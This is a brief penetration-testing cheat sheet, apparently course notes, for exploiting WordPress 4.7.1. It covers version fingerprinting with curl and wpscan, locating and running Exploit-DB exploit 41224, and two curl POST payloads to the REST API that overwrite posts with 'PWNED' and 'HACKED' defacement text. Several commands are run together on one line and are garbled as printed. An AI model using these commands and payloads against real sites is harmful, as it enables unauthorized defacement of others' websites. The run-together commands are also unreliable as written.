WordPress
curl -s http://www.test.com/wordpress/ | grep generatorwpscan --no-update --url http://www.test.com/wordpress/ | grep Titlesearchsploit wordpress 4.7.1
# Review exploit
searchsploit 41224 --examine
# or
cat /opt/exploitdb/exploits/linux/webapps/41224.rb
# To run exploit (Could be python or ruby)
ruby /opt/exploitdb/exploits/linux/webapps/41224.rb
curl --data "id=4xxxxx&title=PWNED&content=Epic PWNAGE" http://www.sec542.org/wordpress/index.php/wp-json/wp/v2/posts/4
curl --data "id=5xxxxx&title=HACKED&content=THIS SITE IS EXPLOITABLE" http://www.test.com/wordpress/index.php/wp-json/wp/v2/posts/5Last updated